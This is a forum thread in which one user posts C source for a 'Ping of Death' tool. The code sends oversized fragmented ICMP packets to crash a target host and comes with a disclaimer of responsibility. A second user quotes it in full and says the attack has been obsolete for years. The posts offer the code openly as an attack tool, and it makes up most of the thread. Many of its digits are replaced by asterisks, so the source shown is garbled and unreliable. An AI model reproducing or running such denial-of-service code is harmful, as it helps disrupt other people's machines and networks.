cactus
+ Reply to Thread
Results 1 to 4 of 4

Thread: Ping of Death C source code

  1. #1
    Join Date
    Sep 2006
    Posts
    1,651

    Ping of Death C source code

    Here is a code I found - NOT claiming to be mine - that is written in C (and hence works for C++) that can send out huge ping packets and crash computers. DISCLAIMER - I am not responsible for what you do with this

    Code:
    /*
     * win*5ping.c
     *
     * Simulate the evil win*5 "ping -l 655*0 b***yhost".
     * version *.0 Bill Fenner <fenner@freebsd.org> 22-Oct-***6
     *
     * This requires raw sockets that don't mess with the packet at all (other
     * than adding the checksum).  That means that SunOS, Solaris, and
     * BSD4.*-based systems are out.  BSD4.4 systems (FreeBSD, NetBSD,
     * OpenBSD, BSDI) will work.  Linux might work, I don't have a Linux
     * system to try it on.
     *
     * The attack from the Win*5 box looks like:
     * *7:26:**.0**622 cslwin*5 > arkroyal: icmp: echo request (frag 6*44:*480@0+)
     * *7:26:**.0*507* cslwin*5 > arkroyal: (frag 6*44:*480@*480+)
     * *7:26:**.0*66*7 cslwin*5 > arkroyal: (frag 6*44:*480@2*60+)
     * *7:26:**.0*7577 cslwin*5 > arkroyal: (frag 6*44:*480@4440+)
     * *7:26:**.0*88** cslwin*5 > arkroyal: (frag 6*44:*480@5*20+)
     * *7:26:**.020**2 cslwin*5 > arkroyal: (frag 6*44:*480@7400+)
     * *7:26:**.02**46 cslwin*5 > arkroyal: (frag 6*44:*480@8880+)
     * *7:26:**.02264* cslwin*5 > arkroyal: (frag 6*44:*480@*0*60+)
     * *7:26:**.02*86* cslwin*5 > arkroyal: (frag 6*44:*480@**840+)
     * *7:26:**.025*40 cslwin*5 > arkroyal: (frag 6*44:*480@***20+)
     * *7:26:**.026604 cslwin*5 > arkroyal: (frag 6*44:*480@*4800+)
     * *7:26:**.027628 cslwin*5 > arkroyal: (frag 6*44:*480@*6280+)
     * *7:26:**.02887* cslwin*5 > arkroyal: (frag 6*44:*480@*7760+)
     * *7:26:**.0*0*00 cslwin*5 > arkroyal: (frag 6*44:*480@**240+)
     * *7:26:**.0***07 cslwin*5 > arkroyal: (frag 6*44:*480@20720+)
     * *7:26:**.0*2542 cslwin*5 > arkroyal: (frag 6*44:*480@22200+)
     * *7:26:**.0**774 cslwin*5 > arkroyal: (frag 6*44:*480@2*680+)
     * *7:26:**.0*50*8 cslwin*5 > arkroyal: (frag 6*44:*480@25*60+)
     * *7:26:**.0*6576 cslwin*5 > arkroyal: (frag 6*44:*480@26640+)
     * *7:26:**.0*7464 cslwin*5 > arkroyal: (frag 6*44:*480@28*20+)
     * *7:26:**.0*86*6 cslwin*5 > arkroyal: (frag 6*44:*480@2*600+)
     * *7:26:**.0***66 cslwin*5 > arkroyal: (frag 6*44:*480@**080+)
     * *7:26:**.04*2*8 cslwin*5 > arkroyal: (frag 6*44:*480@*2560+)
     * *7:26:**.04257* cslwin*5 > arkroyal: (frag 6*44:*480@*4040+)
     * *7:26:**.04*807 cslwin*5 > arkroyal: (frag 6*44:*480@*5520+)
     * *7:26:**.046276 cslwin*5 > arkroyal: (frag 6*44:*480@*7000+)
     * *7:26:**.0472*6 cslwin*5 > arkroyal: (frag 6*44:*480@*8480+)
     * *7:26:**.048478 cslwin*5 > arkroyal: (frag 6*44:*480@***60+)
     * *7:26:**.04*6*8 cslwin*5 > arkroyal: (frag 6*44:*480@4*440+)
     * *7:26:**.050*2* cslwin*5 > arkroyal: (frag 6*44:*480@42*20+)
     * *7:26:**.052*64 cslwin*5 > arkroyal: (frag 6*44:*480@44400+)
     * *7:26:**.05***8 cslwin*5 > arkroyal: (frag 6*44:*480@45880+)
     * *7:26:**.054685 cslwin*5 > arkroyal: (frag 6*44:*480@47*60+)
     * *7:26:**.056*47 cslwin*5 > arkroyal: (frag 6*44:*480@48840+)
     * *7:26:**.057*** cslwin*5 > arkroyal: (frag 6*44:*480@50*20+)
     * *7:26:**.058*57 cslwin*5 > arkroyal: (frag 6*44:*480@5*800+)
     * *7:26:**.05*588 cslwin*5 > arkroyal: (frag 6*44:*480@5*280+)
     * *7:26:**.060787 cslwin*5 > arkroyal: (frag 6*44:*480@54760+)
     * *7:26:**.06202* cslwin*5 > arkroyal: (frag 6*44:*480@56240+)
     * *7:26:**.06*247 cslwin*5 > arkroyal: (frag 6*44:*480@57720+)
     * *7:26:**.06447* cslwin*5 > arkroyal: (frag 6*44:*480@5*200+)
     * *7:26:**.066252 cslwin*5 > arkroyal: (frag 6*44:*480@60680+)
     * *7:26:**.066*57 cslwin*5 > arkroyal: (frag 6*44:*480@62*60+)
     * *7:26:**.068220 cslwin*5 > arkroyal: (frag 6*44:*480@6*640+)
     * *7:26:**.06**07 cslwin*5 > arkroyal: (frag 6*44:**8@65*20)
     * 
     */
    
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <netinet/in_systm.h>
    #include <netinet/ip.h>
    #include <netinet/ip_icmp.h>
    
    /*
     * If your kernel doesn't muck with raw packets, #define REALLY_RAW.
     * This is probably only Linux.
     */
    #ifdef REALLY_RAW
    #define FIX(x)  htons(x)
    #else
    #define FIX(x)  (x)
    #endif
    
    int
    main(int argc, char **argv)
    {
            int s;
            char buf[*500];
            struct ip *ip = (struct ip *)buf;
            struct icmp *icmp = (struct icmp *)(ip + *);
            struct hostent *hp;
            struct sockaddr_in dst;
            int offset;
            int on = *;
    
            bzero(buf, sizeof buf);
    
            if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
                    perror("socket");
                    exit(*);
            }
            if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
                    perror("IP_HDRINCL");
                    exit(*);
            }
            if (argc != 2) {
                    fprintf(stderr, "usage: %s hostname\n", argv[0]);
                    exit(*);
            }
            if ((hp = gethostbyname(argv[*])) == NULL) {
                    if ((ip->ip_dst.s_addr = inet_addr(argv[*])) == -*) {
                            fprintf(stderr, "%s: unknown host\n", argv[*]);
                    }
            } else {
                    bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
            }
            printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
            ip->ip_v = 4;
            ip->ip_hl = sizeof *ip >> 2;
            ip->ip_tos = 0;
            ip->ip_len = FIX(sizeof buf);
            ip->ip_id = htons(4*2*);
            ip->ip_off = FIX(0);
            ip->ip_ttl = 255;
            ip->ip_p = *;
            ip->ip_sum = 0;                 /* kernel fills in */
            ip->ip_src.s_addr = 0;          /* kernel fills in */
    
            dst.sin_addr = ip->ip_dst;
            dst.sin_family = AF_INET;
    
            icmp->icmp_type = ICMP_ECHO;
            icmp->icmp_code = 0;
            icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
                    /* the checksum of all 0's is easy to compute */
    
            for (offset = 0; offset < 655*6; offset += (sizeof buf - sizeof *ip)) {
                    ip->ip_off = FIX(offset >> *);
                    if (offset < 65*20)
                            ip->ip_off |= FIX(IP_MF);
                    else
                            ip->ip_len = FIX(4*8);  /* make total 655*8 */
                    if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
                                            sizeof dst) < 0) {
                            fprintf(stderr, "offset %d: ", offset);
                            perror("sendto");
                    }
                    if (offset == 0) {
                            icmp->icmp_type = 0;
                            icmp->icmp_code = 0;
                            icmp->icmp_cksum = 0;
                    }
            }
    }

  2. #2
    Join Date
    Sep 2005
    Posts
    2,053
    Quote Originally Posted by Moonbat
    Here is a code I found - NOT claiming to be mine - that is written in C (and hence works for C++) that can send out huge ping packets and crash computers. DISCLAIMER - I am not responsible for what you do with this

    Code:
    /*
     * win*5ping.c
     *
     * Simulate the evil win*5 "ping -l 655*0 b***yhost".
     * version *.0 Bill Fenner <fenner@freebsd.org> 22-Oct-***6
     *
     * This requires raw sockets that don't mess with the packet at all (other
     * than adding the checksum).  That means that SunOS, Solaris, and
     * BSD4.*-based systems are out.  BSD4.4 systems (FreeBSD, NetBSD,
     * OpenBSD, BSDI) will work.  Linux might work, I don't have a Linux
     * system to try it on.
     *
     * The attack from the Win*5 box looks like:
     * *7:26:**.0**622 cslwin*5 > arkroyal: icmp: echo request (frag 6*44:*480@0+)
     * *7:26:**.0*507* cslwin*5 > arkroyal: (frag 6*44:*480@*480+)
     * *7:26:**.0*66*7 cslwin*5 > arkroyal: (frag 6*44:*480@2*60+)
     * *7:26:**.0*7577 cslwin*5 > arkroyal: (frag 6*44:*480@4440+)
     * *7:26:**.0*88** cslwin*5 > arkroyal: (frag 6*44:*480@5*20+)
     * *7:26:**.020**2 cslwin*5 > arkroyal: (frag 6*44:*480@7400+)
     * *7:26:**.02**46 cslwin*5 > arkroyal: (frag 6*44:*480@8880+)
     * *7:26:**.02264* cslwin*5 > arkroyal: (frag 6*44:*480@*0*60+)
     * *7:26:**.02*86* cslwin*5 > arkroyal: (frag 6*44:*480@**840+)
     * *7:26:**.025*40 cslwin*5 > arkroyal: (frag 6*44:*480@***20+)
     * *7:26:**.026604 cslwin*5 > arkroyal: (frag 6*44:*480@*4800+)
     * *7:26:**.027628 cslwin*5 > arkroyal: (frag 6*44:*480@*6280+)
     * *7:26:**.02887* cslwin*5 > arkroyal: (frag 6*44:*480@*7760+)
     * *7:26:**.0*0*00 cslwin*5 > arkroyal: (frag 6*44:*480@**240+)
     * *7:26:**.0***07 cslwin*5 > arkroyal: (frag 6*44:*480@20720+)
     * *7:26:**.0*2542 cslwin*5 > arkroyal: (frag 6*44:*480@22200+)
     * *7:26:**.0**774 cslwin*5 > arkroyal: (frag 6*44:*480@2*680+)
     * *7:26:**.0*50*8 cslwin*5 > arkroyal: (frag 6*44:*480@25*60+)
     * *7:26:**.0*6576 cslwin*5 > arkroyal: (frag 6*44:*480@26640+)
     * *7:26:**.0*7464 cslwin*5 > arkroyal: (frag 6*44:*480@28*20+)
     * *7:26:**.0*86*6 cslwin*5 > arkroyal: (frag 6*44:*480@2*600+)
     * *7:26:**.0***66 cslwin*5 > arkroyal: (frag 6*44:*480@**080+)
     * *7:26:**.04*2*8 cslwin*5 > arkroyal: (frag 6*44:*480@*2560+)
     * *7:26:**.04257* cslwin*5 > arkroyal: (frag 6*44:*480@*4040+)
     * *7:26:**.04*807 cslwin*5 > arkroyal: (frag 6*44:*480@*5520+)
     * *7:26:**.046276 cslwin*5 > arkroyal: (frag 6*44:*480@*7000+)
     * *7:26:**.0472*6 cslwin*5 > arkroyal: (frag 6*44:*480@*8480+)
     * *7:26:**.048478 cslwin*5 > arkroyal: (frag 6*44:*480@***60+)
     * *7:26:**.04*6*8 cslwin*5 > arkroyal: (frag 6*44:*480@4*440+)
     * *7:26:**.050*2* cslwin*5 > arkroyal: (frag 6*44:*480@42*20+)
     * *7:26:**.052*64 cslwin*5 > arkroyal: (frag 6*44:*480@44400+)
     * *7:26:**.05***8 cslwin*5 > arkroyal: (frag 6*44:*480@45880+)
     * *7:26:**.054685 cslwin*5 > arkroyal: (frag 6*44:*480@47*60+)
     * *7:26:**.056*47 cslwin*5 > arkroyal: (frag 6*44:*480@48840+)
     * *7:26:**.057*** cslwin*5 > arkroyal: (frag 6*44:*480@50*20+)
     * *7:26:**.058*57 cslwin*5 > arkroyal: (frag 6*44:*480@5*800+)
     * *7:26:**.05*588 cslwin*5 > arkroyal: (frag 6*44:*480@5*280+)
     * *7:26:**.060787 cslwin*5 > arkroyal: (frag 6*44:*480@54760+)
     * *7:26:**.06202* cslwin*5 > arkroyal: (frag 6*44:*480@56240+)
     * *7:26:**.06*247 cslwin*5 > arkroyal: (frag 6*44:*480@57720+)
     * *7:26:**.06447* cslwin*5 > arkroyal: (frag 6*44:*480@5*200+)
     * *7:26:**.066252 cslwin*5 > arkroyal: (frag 6*44:*480@60680+)
     * *7:26:**.066*57 cslwin*5 > arkroyal: (frag 6*44:*480@62*60+)
     * *7:26:**.068220 cslwin*5 > arkroyal: (frag 6*44:*480@6*640+)
     * *7:26:**.06**07 cslwin*5 > arkroyal: (frag 6*44:**8@65*20)
     * 
     */
    
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <netinet/in_systm.h>
    #include <netinet/ip.h>
    #include <netinet/ip_icmp.h>
    
    /*
     * If your kernel doesn't muck with raw packets, #define REALLY_RAW.
     * This is probably only Linux.
     */
    #ifdef REALLY_RAW
    #define FIX(x)  htons(x)
    #else
    #define FIX(x)  (x)
    #endif
    
    int
    main(int argc, char **argv)
    {
            int s;
            char buf[*500];
            struct ip *ip = (struct ip *)buf;
            struct icmp *icmp = (struct icmp *)(ip + *);
            struct hostent *hp;
            struct sockaddr_in dst;
            int offset;
            int on = *;
    
            bzero(buf, sizeof buf);
    
            if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
                    perror("socket");
                    exit(*);
            }
            if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
                    perror("IP_HDRINCL");
                    exit(*);
            }
            if (argc != 2) {
                    fprintf(stderr, "usage: %s hostname\n", argv[0]);
                    exit(*);
            }
            if ((hp = gethostbyname(argv[*])) == NULL) {
                    if ((ip->ip_dst.s_addr = inet_addr(argv[*])) == -*) {
                            fprintf(stderr, "%s: unknown host\n", argv[*]);
                    }
            } else {
                    bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
            }
            printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
            ip->ip_v = 4;
            ip->ip_hl = sizeof *ip >> 2;
            ip->ip_tos = 0;
            ip->ip_len = FIX(sizeof buf);
            ip->ip_id = htons(4*2*);
            ip->ip_off = FIX(0);
            ip->ip_ttl = 255;
            ip->ip_p = *;
            ip->ip_sum = 0;                 /* kernel fills in */
            ip->ip_src.s_addr = 0;          /* kernel fills in */
    
            dst.sin_addr = ip->ip_dst;
            dst.sin_family = AF_INET;
    
            icmp->icmp_type = ICMP_ECHO;
            icmp->icmp_code = 0;
            icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
                    /* the checksum of all 0's is easy to compute */
    
            for (offset = 0; offset < 655*6; offset += (sizeof buf - sizeof *ip)) {
                    ip->ip_off = FIX(offset >> *);
                    if (offset < 65*20)
                            ip->ip_off |= FIX(IP_MF);
                    else
                            ip->ip_len = FIX(4*8);  /* make total 655*8 */
                    if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
                                            sizeof dst) < 0) {
                            fprintf(stderr, "offset %d: ", offset);
                            perror("sendto");
                    }
                    if (offset == 0) {
                            icmp->icmp_type = 0;
                            icmp->icmp_code = 0;
                            icmp->icmp_cksum = 0;
                    }
            }
    }
    Ping of death may have worked *0 years ago, but it all the major operating systems are no longer vulnerable.

    That code is only for *nix systems, and windows systems can't even perform the attack now anyway.

  3. #3
    Join Date
    Sep 2006
    Posts
    1,651

    a

    Huh? So.. you mean that... it's like... not gonna work?
    Well, at least we can all learn from this code, somehow

  4. #4
    Join Date
    Sep 2005
    Posts
    2,053
    Quote Originally Posted by Moonbat
    Huh? So.. you mean that... it's like... not gonna work?
    Well, at least we can all learn from this code, somehow
    It has not worked in nearly *0 years - the frequent references to 'win*5' in the code show how long ago this vulnerability was fixed.

+ Reply to Thread

Similar Threads

  1. Need help getting source code for mysql.
    By ilyacella621 in forum Internet Privacy
    Replies: 2
    Last Post: 05-12-2007, 08:49 PM
  2. Source code
    By mlg solidsnake in forum Tutorials
    Replies: 18
    Last Post: 04-30-2007, 01:08 PM
  3. Help with Ping of Death
    By Faithy in forum Internet Privacy
    Replies: 0
    Last Post: 11-28-2005, 12:55 PM
  4. Ping of death
    By carlo in forum Internet Privacy
    Replies: 3
    Last Post: 10-28-2005, 12:31 PM
  5. Ping o death
    By guest in forum Viruses and Trojans
    Replies: 6
    Last Post: 03-29-2005, 05:44 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts